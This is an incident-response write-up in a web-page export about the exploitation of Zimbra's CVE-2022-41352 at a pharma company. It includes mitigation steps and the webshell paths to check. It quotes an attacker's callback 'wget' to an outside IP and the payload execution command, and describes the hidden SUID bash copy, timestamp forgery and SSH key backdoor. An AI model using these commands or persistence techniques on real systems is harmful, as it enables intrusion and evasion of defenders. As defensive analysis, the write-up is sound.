{"id":59046,"date":"2022-10-24T09:37:54","date_gmt":"2022-10-24T01:37:54","guid":{"rendered":"https:\/\/version-2.com\/?p=59046"},"modified":"2023-10-16T17:35:14","modified_gmt":"2023-10-16T09:35:14","slug":"massive-infection-through-0-day-in-the-zimbra-email-suite-cve-2022-41352","status":"publish","type":"post","link":"https:\/\/version-2.com\/zh\/2022\/10\/massive-infection-through-0-day-in-the-zimbra-email-suite-cve-2022-41352\/","title":{"rendered":"Massive Infection through 0-day in the Zimbra Email suite (CVE-2022-41352)"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-post\" data-elementor-id=\"59046\" class=\"elementor elementor-59046\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-35fe5dd post-content elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"35fe5dd\" data-element_type=\"section\" data-e-type=\"section\" data-settings=\"{&quot;jet_parallax_layout_list&quot;:[{&quot;jet_parallax_layout_image&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;_id&quot;:&quot;cef08c3&quot;,&quot;jet_parallax_layout_image_tablet&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_image_mobile&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_speed&quot;:{&quot;unit&quot;:&quot;%&quot;,&quot;size&quot;:50,&quot;sizes&quot;:[]},&quot;jet_parallax_layout_type&quot;:&quot;scroll&quot;,&quot;jet_parallax_layout_direction&quot;:&quot;1&quot;,&quot;jet_parallax_layout_fx_direction&quot;:null,&quot;jet_parallax_layout_z_index&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x&quot;:50,&quot;jet_parallax_layout_bg_x_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y&quot;:50,&quot;jet_parallax_layout_bg_y_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size&quot;:&quot;auto&quot;,&quot;jet_parallax_layout_bg_size_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_animation_prop&quot;:&quot;transform&quot;,&quot;jet_parallax_layout_on&quot;:[&quot;desktop&quot;,&quot;tablet&quot;]}]}\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-409a2e9a\" data-id=\"409a2e9a\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-5a8be8f elementor-widget elementor-widget-text-editor\" data-id=\"5a8be8f\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t\n<h2>Incident Overview<\/h2>\n<p>On October 7, the email server of a big commercial pharma organization was attacked. It was running Zimbra 8.x version on CentOS and got quickly compromised. Malicious actor exploited Internet-facing Zimbra Collaboration Suite using CVE-2022-41352 \u201ccpio\u201d zero-day vulnerability.<\/p>\n<p>Our investigation revealed and was able to confirm that unknown APT groups are massively exploiting an unpatched vulnerability (CVE-2022-41352) in Zimbra Collaboration Suite to infect vulnerable servers. <\/p>\n<p>Initial foothold was discovered through CrowdStrike EDR on that Linux mail server unfortunately for the sutomer it just detected but did not prevent the exploitation because of the insufficient Prevention Policy aggressiveness as customer had just started dealing with Crowdstrike software and it was in fine-tuning mode. Soon after the detection, MDR\/SOC team initiated Incident Response, gathered information and contacted the client\u2019s representatives via Google Meet.<\/p>\n<p>After the approval, the host was <strong>network-isolated<\/strong>, all client\u2019s endpoints were moved to the <strong>highest<\/strong> Prevention Policy.<\/p>\n<h2><strong>Recommendations &amp; Remediation<\/strong><\/h2>\n<p>Since Zimbra released a patch for this vulnerability, the best course of action is to update your devices immediately. If this, for some reason, is not possible, installing&nbsp;pax&nbsp;on the machine hosting the Zimbra installation will prevent the vulnerability from being exploitable. pax is available from package managers (such as apt and yum) of all major Linux distributions. Among all Linux variants officially supported by Zimbra, only Ubuntu installs pax by default and is therefore not affected by CVE-2022-41352:<\/p>\n<figure class=\"wp-block-table\"><table><tbody><tr><td><strong>Distribution<\/strong><\/td><td><strong>Vulnerable to CVE-2022-41352<\/strong><\/td><\/tr><tr><td>Red Hat Enterprise Linux 7<\/td><td>Yes<\/td><\/tr><tr><td>Red Hat Enterprise Linux 8<\/td><td>Yes<\/td><\/tr><tr><td>CentOS 7<\/td><td>Yes<\/td><\/tr><tr><td>CentOS 8<\/td><td>Yes<\/td><\/tr><tr><td>Oracle Linux 7<\/td><td>Yes<\/td><\/tr><tr><td>Oracle Linux 8<\/td><td>Yes<\/td><\/tr><tr><td>Rocky Linux 8<\/td><td>Yes<\/td><\/tr><tr><td>Ubuntu 16.04 LTS<\/td><td>No<\/td><\/tr><tr><td>Ubuntu 18.04 LTS<\/td><td>No<\/td><\/tr><tr><td>Ubuntu 20.04 LTS<\/td><td>No<\/td><\/tr><\/tbody><\/table><\/figure>\n<h2 id=\"remediation\"><\/h2>\n<p>Please note that installing pax doesn\u2019t address the root issue with any distribution, where other program paths, both within and outside of Zimbra could still cause cpio to process untrusted data.<\/p>\n<p>After taking the aforementioned mitigation steps, owners of Zimbra servers are encouraged to check for traces of compromise. The following paths are known locations for webshells deployed by malicious actors currently leveraging CVE-2022-41352:<\/p>\n<figure class=\"wp-block-table\"><table><tbody><tr><td>123456<\/td><td>\/opt\/zimbra\/jetty\/webapps\/zimbra\/public\/.error.jsp\/opt\/zimbra\/jetty\/webapps\/zimbra\/public\/ResourcesVerificaton.jsp\/opt\/zimbra\/jetty\/webapps\/zimbra\/public\/ResourceVerificaton.jsp\/opt\/zimbra\/jetty\/webapps\/zimbra\/public\/ZimletCore.jsp\/opt\/zimbra\/jetty\/webapps\/zimbra\/public\/searchx.jsp\/opt\/zimbra\/jetty\/webapps\/zimbra\/public\/seachx.jsp<\/td><\/tr><\/tbody><\/table><\/figure>\n<p>In addition, it is worth noting that the Metasploit exploit drops its webshell in the following location:<\/p>\n<figure class=\"wp-block-table\"><table><tbody><tr><td>1<\/td><td>\/opt\/zimbra\/jetty_base\/webapps\/zimbra\/[4-10 random characters].jsp<\/td><\/tr><\/tbody><\/table><\/figure>\n<p>If you discover one of these files on your Zimbra installation, please contact an incident response specialist as soon as possible. Removing the file is not enough. Performing disinfection on Zimbra is extremely difficult, as the attacker will have had access to configuration files containing passwords used by various service accounts. These credentials can be used to regain access to the server if the administrative panel is accessible from the internet. In addition, considering the rudimentary nature of all webshells we have discovered so far, it is almost certain that attackers will deploy more robust and sophisticated backdoors as soon as they get the chance.<\/p>\n<h2><strong>Case Details<\/strong><\/h2>\n<p><strong>October 7, <\/strong>mail server running Zimbra 8.x version on CentOS was compromised. An unidentified malicious actor exploited Internet-facing Zimbra Collaboration Suite using <a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2022-41352\">CVE-2022-41352<\/a> \u201ccpio\u201d zero-day vulnerability.<\/p>\n<p>After the approval, the host was <strong>network-isolated<\/strong>, all client\u2019s endpoints were moved to the highest Prevention Policy.<\/p>\n<p>Based on the CrowdStrike data, IR team stopped the threat quickly enough and did not find any traces of data exfiltration, confidential data access or any activity that may severely harm business continuity.<\/p>\n<p><\/p>\n<h2><strong>Initial Access<\/strong><\/h2>\n<p>On <strong>October 7, at 15:55<\/strong>, malicious actor achieved RCE with <strong>root <\/strong>permissions via Zimbra vulnerability.The server infection began from downloading a few unknown files, most notably <strong>\/tmp\/.opt\/sh<\/strong>. Content and purpose of other files are unknown, as well as the reason for the new Nginx server execution.<\/p>\n<figure class=\"wp-block-image size-full\"><img fetchpriority=\"high\" decoding=\"async\" width=\"880\" height=\"356\" src=\"https:\/\/underdefense.com\/wp-content\/uploads\/2022\/10\/initial_access.png\"  \/><\/figure>\n<h2><strong>Execution &amp; Reconnaissance<\/strong><\/h2>\n<p>A few seconds later after the download, malicious actor executed an unknown file: <strong>\/opt\/zimbra\/common\/libexec\/slapd -u root -g root -f \/tmp\/.opt\/cfg2<\/strong><\/p>\n<p>Immediately after, the main infection script was started. Its purpose was to deeply persist on the system.<\/p>\n<figure class=\"wp-block-image size-large is-resized\"><img decoding=\"async\" src=\"https:\/\/underdefense.com\/wp-content\/uploads\/2022\/10\/1-1024x321.png\" width=\"860\" height=\"270\"><\/figure>\n<h2><strong>Persistence &amp; Defense Evasion<\/strong><\/h2>\n<p>As seen from the CrowdStrike process timeline, the malicious script was executed successfully, given the <strong>wget <\/strong>command to the attackers host with <strong>status=0<\/strong> URL parameter.<\/p>\n<p>\u201cZero\u201d status indicates successful persistence via SSH key, which will be proven a few slides later.<\/p>\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" width=\"743\" height=\"347\" src=\"https:\/\/underdefense.com\/wp-content\/uploads\/2022\/10\/Persistence_Defense_Evasion.png\" \/><\/figure>\n<h2><strong>Main Script: Bash copy with SUID<\/strong><\/h2>\n<p>The hacker copied the Bash binary to <strong>\/usr\/lib\/sftp<\/strong> in order to avoid detection via logs analysis.<\/p>\n<p>To make it work, new Bash copy was made executable and was given <strong>SUID <\/strong>flag to run as <strong>root<\/strong>.<\/p>\n<p>The last trick to avoid detection was to use <strong>touch -r<\/strong> command and copy modification time from <strong>passwd<\/strong> to the newly created backdoor.<\/p>\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"668\" height=\"355\" src=\"https:\/\/underdefense.com\/wp-content\/uploads\/2022\/10\/Main_Script.png\"><figcaption><strong>\/tmp\/.opt\/sh<\/strong> script is well-written and divided into parts. Each part is basically a new persistence mechanism&nbsp;<br><\/figcaption><\/figure>\n<h2><strong>Main Script: Web shell &amp; SSH key<\/strong><\/h2>\n<p>The web shell part seems to be <strong>incorrect<\/strong>. It does not create a new one, but only renames the old web shell, if exists. According to our analysis, old web shell <strong>did not exist<\/strong> during the script execution.<\/p>\n<p>Then, the hacker prepares a few reusable functions and creates new <strong>SSH key pair<\/strong>. It was meant to be used for SSH backdoor on root user.<\/p>\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"679\" height=\"485\" src=\"https:\/\/underdefense.com\/wp-content\/uploads\/2022\/10\/Main_Script_Web_Shell.png\"><\/figure>\n<h2><strong>Main Script: SSH persistence details<\/strong><\/h2>\n<p>The adversary verified many <strong>sshd <\/strong>file configurations to ensure that backdoored key will work as expected.<\/p>\n<p>Furthermore, the hacker tuned <strong>firewall <\/strong>rules and changed default root shell to guarantee correct exploitation.<\/p>\n<p>As a part of defense evasion, <strong>touch -d<\/strong> command was used to revert original modification time of the affected sshd config.<\/p>\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"653\" height=\"430\" src=\"https:\/\/underdefense.com\/wp-content\/uploads\/2022\/10\/Main_Script_SSH_persistence.png\" ><\/figure>\n<h2><strong>Main Script: Cleanup and callback<\/strong><\/h2>\n<p>The last action the script performed was to notify the attacker-controlled server about the end of exploitation. As was shown in the logs before, the callback status is zero, which means success.<\/p>\n<ul><li>wget -O \u2013 <a href=\"http:\/\/198.204.241.2:443?port=22&#038;status=0\" rel=\"nofollow\">http:\/\/198.204.241.2:443?port=22&#038;status=0<\/a><\/li><\/ul>\n<p>Finally, <strong>the hacker patched the exploited CVE<\/strong> simply by removing the vulnerable cpio package and restarting the Zimbra service. Since the CVE is actively exploited, this was the logical step to avoid conflicts with other hackers\u2019 activities while retaining a solid persistence on the host.<\/p>\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"772\" height=\"218\" height=\"218\" src=\"https:\/\/underdefense.com\/wp-content\/uploads\/2022\/10\/Main_Script_Cleanup_and_callback.png\" ><\/figure>\n<h2><strong>Main Script: Attachments<\/strong><\/h2>\n<p>The SOC team has not detected any further suspicious SSH logins, exfiltration attempts or other suspicious actions on all of the monitored client\u2019s devices.<\/p>\n<p>Still, the client has provided multiple proofs of successful exploitation. Clockwise, the screenshots are:<\/p>\n<ul><li>New sftp binary with the same size as bash, having SUID flag and modified timestamp<\/li><li>Infected .ssh folder containing hacker\u2019s keys and modified authorized_keys file<\/li><li>SSH backdoor in authorized_keys file, the same as in the presented script<\/li><\/ul>\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"186\" src=\"https:\/\/underdefense.com\/wp-content\/uploads\/2022\/10\/Main_Script_Attachments-1024x186.png\" ><\/figure>\n<p>Customer reaction:<\/p>\n<p>Based on the CrowdStrike data, UnderDefense Incident Response team <strong>stopped the threat<\/strong> quickly enough before any negative consequences. Incident Response did not find any traces of data exfiltration, confidential data access or any activity that might have severely harmed business continuity.<\/p>\n<p>The client chose to go with a <strong>complete migration to a clean <\/strong>server and copy the Zimbra database and its configs to the new server. Given that fact, it is highly recommended to:<\/p>\n<ul><li>Install the newest Zimbra version, and mitigate the vulnerability as described <a href=\"https:\/\/blog.zimbra.com\/2022\/09\/security-update-make-sure-to-install-pax-spax\/\">here<\/a><\/li><li>Ensure Zimbra is installed from a service, low-privileged user, not root account<\/li><li>Provide file integrity check on all Zimbra files to eliminate .jsp backdoors<\/li><li>Reset passwords for the infected server users, enable MFA for Zimbra admins<\/li><\/ul>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-2004c86 elementor-widget elementor-widget-shortcode\" data-id=\"2004c86\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"shortcode.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"elementor-shortcode\">\t\t<div data-elementor-type=\"page\" data-elementor-id=\"18103\" class=\"elementor elementor-18103\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-748947f elementor-section-full_width elementor-section-height-default elementor-section-height-default\" data-id=\"748947f\" data-element_type=\"section\" data-e-type=\"section\" data-settings=\"{&quot;jet_parallax_layout_list&quot;:[{&quot;jet_parallax_layout_image&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;_id&quot;:&quot;c4f773e&quot;,&quot;jet_parallax_layout_image_tablet&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_image_mobile&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_speed&quot;:{&quot;unit&quot;:&quot;%&quot;,&quot;size&quot;:50,&quot;sizes&quot;:[]},&quot;jet_parallax_layout_type&quot;:&quot;scroll&quot;,&quot;jet_parallax_layout_direction&quot;:&quot;1&quot;,&quot;jet_parallax_layout_fx_direction&quot;:null,&quot;jet_parallax_layout_z_index&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x&quot;:50,&quot;jet_parallax_layout_bg_x_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y&quot;:50,&quot;jet_parallax_layout_bg_y_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size&quot;:&quot;auto&quot;,&quot;jet_parallax_layout_bg_size_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_animation_prop&quot;:&quot;transform&quot;,&quot;jet_parallax_layout_on&quot;:[&quot;desktop&quot;,&quot;tablet&quot;]}]}\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-7995c19\" data-id=\"7995c19\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-a437045 elementor-widget elementor-widget-image-box\" data-id=\"a437045\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image-box.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<div class=\"elementor-image-box-wrapper\"><div class=\"elementor-image-box-content\"><h3 class=\"elementor-image-box-title\">About Version 2 Digital<\/h3><p class=\"elementor-image-box-description\">Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.\n<br><br>\nThrough an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.<\/p><\/div><\/div>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t\n\t\t<div data-elementor-type=\"page\" data-elementor-id=\"54023\" class=\"elementor elementor-54023\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-6b25dc0d elementor-section-full_width elementor-section-height-default elementor-section-height-default\" data-id=\"6b25dc0d\" data-element_type=\"section\" data-e-type=\"section\" data-settings=\"{&quot;jet_parallax_layout_list&quot;:[{&quot;_id&quot;:&quot;c4f773e&quot;,&quot;jet_parallax_layout_image&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_image_tablet&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_image_mobile&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_speed&quot;:{&quot;unit&quot;:&quot;%&quot;,&quot;size&quot;:50,&quot;sizes&quot;:[]},&quot;jet_parallax_layout_type&quot;:&quot;scroll&quot;,&quot;jet_parallax_layout_direction&quot;:&quot;1&quot;,&quot;jet_parallax_layout_fx_direction&quot;:null,&quot;jet_parallax_layout_z_index&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x&quot;:50,&quot;jet_parallax_layout_bg_x_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y&quot;:50,&quot;jet_parallax_layout_bg_y_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size&quot;:&quot;auto&quot;,&quot;jet_parallax_layout_bg_size_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_animation_prop&quot;:&quot;transform&quot;,&quot;jet_parallax_layout_on&quot;:[&quot;desktop&quot;,&quot;tablet&quot;]}]}\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-3cc1b37d\" data-id=\"3cc1b37d\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-52c4a230 elementor-widget elementor-widget-text-editor\" data-id=\"52c4a230\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p><strong>About UnderDefense<\/strong><br>\nUnderDefense, a globally top-ranked firm by Gartner and Clutch, provides cyber resiliency consulting and technology-enabled services to anticipate, manage and defend against cyber threats. We empower clients to predict, prevent, detect, and respond to threats.<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>Incident Overview On October 7, the email server of a b [&hellip;]<\/p>\n","protected":false},"author":143524195,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[488,938,61],"tags":[489,937],"class_list":["post-59046","post","type-post","status-publish","format-standard","hentry","category-488","category-underdefense","category-press-release","tag-489","tag-underdefense"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.3 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Massive Infection through 0-day in the Zimbra Email suite (CVE-2022-41352) - Version 2<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/underdefense.com\/blog\/massive-infection-through-0-day-in-the-zimbra-email-suite-cve-2022-41352\/\" \/>\n<meta property=\"og:locale\" content=\"zh_HK\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Massive Infection through 0-day in the Zimbra Email suite (CVE-2022-41352) - Version 2\" \/>\n<meta property=\"og:description\" content=\"Incident Overview On October 7, the email server of a b [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/underdefense.com\/blog\/massive-infection-through-0-day-in-the-zimbra-email-suite-cve-2022-41352\/\" \/>\n<meta property=\"og:site_name\" content=\"Version 2\" \/>\n<meta property=\"article:published_time\" content=\"2022-10-24T01:37:54+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2023-10-16T09:35:14+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/underdefense.com\/wp-content\/uploads\/2022\/10\/initial_access.png\" \/>\n<meta name=\"author\" content=\"version2hk\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u4f5c\u8005\" \/>\n\t<meta name=\"twitter:data1\" content=\"version2hk\" \/>\n\t<meta name=\"twitter:label2\" content=\"\u9810\u8a08\u95b1\u8b80\u6642\u9593\" \/>\n\t<meta name=\"twitter:data2\" content=\"7 \u5206\u9418\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/underdefense.com\\\/blog\\\/massive-infection-through-0-day-in-the-zimbra-email-suite-cve-2022-41352\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/2022\\\/10\\\/massive-infection-through-0-day-in-the-zimbra-email-suite-cve-2022-41352\\\/\"},\"author\":{\"name\":\"version2hk\",\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#\\\/schema\\\/person\\\/d14d2d3cd77ffdb618b9f1330fe084db\"},\"headline\":\"Massive Infection through 0-day in the Zimbra Email suite (CVE-2022-41352)\",\"datePublished\":\"2022-10-24T01:37:54+00:00\",\"dateModified\":\"2023-10-16T09:35:14+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/2022\\\/10\\\/massive-infection-through-0-day-in-the-zimbra-email-suite-cve-2022-41352\\\/\"},\"wordCount\":1264,\"publisher\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/underdefense.com\\\/blog\\\/massive-infection-through-0-day-in-the-zimbra-email-suite-cve-2022-41352\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/underdefense.com\\\/wp-content\\\/uploads\\\/2022\\\/10\\\/initial_access.png\",\"keywords\":[\"2022\",\"UnderDefense\"],\"articleSection\":[\"2022\",\"UnderDefense\",\"Press Release\"],\"inLanguage\":\"zh-HK\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/version-2.com\\\/2022\\\/10\\\/massive-infection-through-0-day-in-the-zimbra-email-suite-cve-2022-41352\\\/\",\"url\":\"https:\\\/\\\/underdefense.com\\\/blog\\\/massive-infection-through-0-day-in-the-zimbra-email-suite-cve-2022-41352\\\/\",\"name\":\"Massive Infection through 0-day in the Zimbra Email suite (CVE-2022-41352) - Version 2\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/underdefense.com\\\/blog\\\/massive-infection-through-0-day-in-the-zimbra-email-suite-cve-2022-41352\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/underdefense.com\\\/blog\\\/massive-infection-through-0-day-in-the-zimbra-email-suite-cve-2022-41352\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/underdefense.com\\\/wp-content\\\/uploads\\\/2022\\\/10\\\/initial_access.png\",\"datePublished\":\"2022-10-24T01:37:54+00:00\",\"dateModified\":\"2023-10-16T09:35:14+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/underdefense.com\\\/blog\\\/massive-infection-through-0-day-in-the-zimbra-email-suite-cve-2022-41352\\\/#breadcrumb\"},\"inLanguage\":\"zh-HK\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/underdefense.com\\\/blog\\\/massive-infection-through-0-day-in-the-zimbra-email-suite-cve-2022-41352\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"zh-HK\",\"@id\":\"https:\\\/\\\/underdefense.com\\\/blog\\\/massive-infection-through-0-day-in-the-zimbra-email-suite-cve-2022-41352\\\/#primaryimage\",\"url\":\"https:\\\/\\\/underdefense.com\\\/wp-content\\\/uploads\\\/2022\\\/10\\\/initial_access.png\",\"contentUrl\":\"https:\\\/\\\/underdefense.com\\\/wp-content\\\/uploads\\\/2022\\\/10\\\/initial_access.png\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/underdefense.com\\\/blog\\\/massive-infection-through-0-day-in-the-zimbra-email-suite-cve-2022-41352\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"\u9996\u9801\",\"item\":\"https:\\\/\\\/version-2.com\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Massive Infection through 0-day in the Zimbra Email suite (CVE-2022-41352)\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#website\",\"url\":\"https:\\\/\\\/version-2.com\\\/zh\\\/\",\"name\":\"Version 2\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/version-2.com\\\/zh\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"zh-HK\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#organization\",\"name\":\"Version 2\",\"url\":\"https:\\\/\\\/version-2.com\\\/zh\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"zh-HK\",\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/i0.wp.com\\\/version-2.com\\\/wp-content\\\/uploads\\\/2020\\\/08\\\/v2-hk-hor-4.png?fit=1795%2C335&ssl=1\",\"contentUrl\":\"https:\\\/\\\/i0.wp.com\\\/version-2.com\\\/wp-content\\\/uploads\\\/2020\\\/08\\\/v2-hk-hor-4.png?fit=1795%2C335&ssl=1\",\"width\":1795,\"height\":335,\"caption\":\"Version 